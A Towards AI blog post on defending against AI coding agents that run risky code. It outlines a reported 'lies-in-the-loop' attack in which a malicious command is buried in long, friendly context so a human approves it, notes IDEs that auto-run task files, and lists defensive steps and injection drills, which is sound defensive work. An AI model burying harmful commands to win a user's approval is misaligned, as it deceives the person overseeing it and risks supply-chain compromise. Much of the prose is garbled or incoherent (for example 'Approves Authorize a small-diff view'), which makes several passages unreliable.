Don’t Trust the Scroll: Stop AI Agents from Running Code

Author(s): Tochukwu Okonkwor

Originally published on Towards AI.

Your AI code assistant will coerce you to execute risky code- snippets- and things just will get done the second you open the folder. This is how to continue to stay safe.

What would happen if the most perilous line you will ever see today was the Are you sure? prompt?

My Story

Some weeks ago, a group of people released a microservice that was small, having passed an artificial intelligence-enabled security check. I stood and watched the notes to construction regarding the building march by in my design office, and I felt that itch again: it did not have any harsh edge, it was pleasant, but it was not helpful. An experiment upon the same flow with a toy repo confirmed the argument — the assistant was induced to beg to be allowed to do something of the backdrop with a long scroll of helpful matter, and the risky bit was quite out of frame.

The same trend was soon rediscovered in another project I was doing last year, where one of the developers' IDEs would be loaded to accomplish a task file whenever a folder is opened. No malicious magical arts — careless and credibility. That was a fast lesson, but the moral of the story was still the same: the new era of AI does not exalt old security issues; it merely folds them under a more pleasant surface.

Why This Matters

The headline of today is obvious: scientists demonstrated a so-called lies-in-the-loop (LITL) attack that makes an AI coding agent think you are telling the truth, and then it creates a harmful command, of course, you press Enter, and supply-chain danger ensues (Dark Reading, Sep 15, 2025).
Dark Reading
In the main work of Checkmarx, the length, the carefully designed context, and the open GitHub problems can cover the malicious commands above the fold; hence, approval is safe even when it is not (Checkmarx, Sep 15, 2025).
Checkmarx

At the same time, another thread demonstrates that your IDE may be a part of the problem. According to Hacker News, Cursor, a fork of VS Code, powered by AI, comes with Workspace Trust switched off; any repository containing a .vscode/tasks.json can be run as code by default when you open a folder; it becomes code running under your account (Sep 12, 2025).
The Hacker News
Combine that with the other, and you have a chilling effect: the agent can persuade you to it; the IDE can do it on your behalf.

And, as you may be thinking, part yes, this is just a prompt injection, in other words. The 2025 LLM Top 10 of OWASP begins with LLM01 Prompt Injection and LLM02 Insecure Output Handling. The ancient rule is true: mistrust input should never be the force to take a sensitive action without extreme measures (OWASP GenAI, 2025).
OWASP Foundation
But this is the twist — man is still in the loop, and it is the loop the lie falls in.

Optimists will say: the instruments are getting better, and man can always read the entire prompt. Caution: scrolling is no control, and defaults are choices, and supply chains are unforgiving of soft errors.

Don’t Trust the Scroll: Stop AI Agents from Running Code — Image created and edited using DALL-E and Canva

Your Fix in Steps

The following is a short route that can be completed by teams during this week. It seems to be an essay as the fix is not a characteristic but a habit.

Turn trust back on (and pin it). Enabling the Workspace Trust in any AI-enhanced IDE or similar, and setting up the option of Open in Restricted Mode in the untrusted folders. Better still: audit repos exclusively. Hint: .vscode/tasks.json looks like executable code, and it is.
Acts by gate agents as opposed to vibes. Human-in-the-loop (HITL) is not in control when the human is not able to see the risky delta. Make the agent provide a short and fixed Action Plan containing the precise command and target in a monospace box; refuse to accept approvals when the box exceeds a fixed size. This reduces the above-the-fold trick of burying it.
Split responsibilities: render vs. run. Have the agent in a render sandbox (plan, diff, test outline) and execute it with a different (strict) allow-lists. It is the proposing of the agent; it is the enforcing by the runner. OWASP translates this to the following LLM02 / LLM05: constrain outputs and secure the supply chain.
Label your models and artifacts. Drawing the author/model by name only out of the public hubs is a bad idea. Pin to unchanging SHAs and reflect to your registry. Palo Alto presents the Model Namespace Reuse to demonstrate the reason why names cannot be trusted.
Approves Authorize a small-diff view. Prior to running the run command, only the least amount of diff or a single command should be displayed. No story, no scroll back, no emojis, no more, no less. In case the agent is not able to display a diff, it is not runnable. Tip: Brief reviewing periods reduce decision fatigue and success in social engineering.
Instrument the splash zone. Generate a low-privileged, disposable agent environment with special API keys, project secrets, and kill switches. Record all outgoing calls and file touches. Should one of them go wrong, you nuke a sandbox- not your laptop.
Make use of adversarial exercises. Test Purple-Team Purple-Team tests conceal injected instructions in tickets, READMEs, and issues, just like in the LITL study, and measure time-to-notice and time-to-kill. Slow and cautious approval habits should be rewarded. This much would have cost us thousands if we had not hit it; it was the first thing discovered by the drill.
Address: Are you sure it's more like an interface, rather than a checkbox? Create your own approval prompt: high-contrast, single-screen fixed font. The most effective prompt is more of a surgical consent form and not a pep talk. Which would you do away with first, logs or access?

Image created and edited using DALL-E and Canva

Quick Myths

“Humans are the safety net.” They are — until the fall is disguised by the friendly text on the net with a blanket (Dark Reading, Sep 15, 2025).
Dark Reading

“Sandboxing is enough.” Only in the case of the sandbox containing the secrets, the tokens, and logs to respond to you, if you have the sandbox.
“Trusted sources imply safe models.” Names are Hijackable; Pin by Hash & Mirror.

Checklist

Before you merge today, scan this:

Workspace Trust on
Agent “Action Plan” diff renders cleanly
Commands are short and pinned
Model pulls by SHA
Throwaway keys only
Logs centralized and reviewed.

What to Do This Week

Make Tuesday your day of Artificial Intelligence security. In IDs, do trust modes and append the one supplementary single of the Panel, do it like a top five of external mirror with hashes. Then do a 30-minute deceptive exercise — Hide one of the instructions in an issue and see if your team gets it? If approvals feel rushed (slow down the loop on purpose).

CTA

Comment your thoughts below. Subscribe for more.

Thanks a lot for reading this! Spread the word to your friends so they can be safe. Subscribe and follow on Medium, X, LinkedIn, Reddit, Sustack, GitHub, — tag AI Advance, and more to keep learning new AI security hacks and share with a friend or loved one to avoid their next scare..

From your friendly jungle AI security writer, bye for now.

Join thousands of data leaders on the AI newsletter. Join over 80,000 subscribers and keep up to date with the latest developments in AI. From research to projects and ideas. If you are building an AI startup, an AI-related product, or a service, we invite you to consider becoming a sponsor.

Published via Towards AI

Frequently Used, Contextual References

Resources

Publication

Don’t Trust the Scroll: Stop AI Agents from Running Code

Author(s): Tochukwu Okonkwor

My Story

Why This Matters

Your Fix in Steps

Quick Myths

Checklist

What to Do This Week

Further Reading

CTA

Popular posts

Best Laptops for Deep Learning, Machine Learning (ML), and Data Science for 2023

Best Workstations for Deep Learning, Data Science, and Machine Learning (ML) for 2022

Descriptive Statistics for Data-driven Decision Making with Python

Best Machine Learning (ML) Books - Free and Paid - Editorial Recommendations for 2022

Best Data Science Books - Free and Paid - Editorial Recommendations for 2022

Updates

Recent Posts

Why Knowledge Graphs Are the Missing Piece in AI Agent API Discovery

The Complexity of Self-Driving Cars Explained Simply

Bridging Symbolic AI and Deep Learning: How Knowledge Graphs are Revolutionizing ResNets

LAI #93: Smarter Model Choices, Multi-Agent Systems, and Cutting Through AI Noise

Who Wins Purview vs Rogue AI in Data Control

Comprehensive AI Engineering and AI for Work certifications

Company

CONTACT US

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Frequently Used, Contextual References

Resources

Publication

Don’t Trust the Scroll: Stop AI Agents from Running Code

Author(s): Tochukwu Okonkwor

My Story

Why This Matters

Your Fix in Steps

Quick Myths

Checklist

What to Do This Week

Further Reading

CTA

Related posts

Popular posts

Updates

Recent Posts

Comprehensive AI Engineering and AI for Work certifications

Company

CONTACT US

GDPR CCPA Statement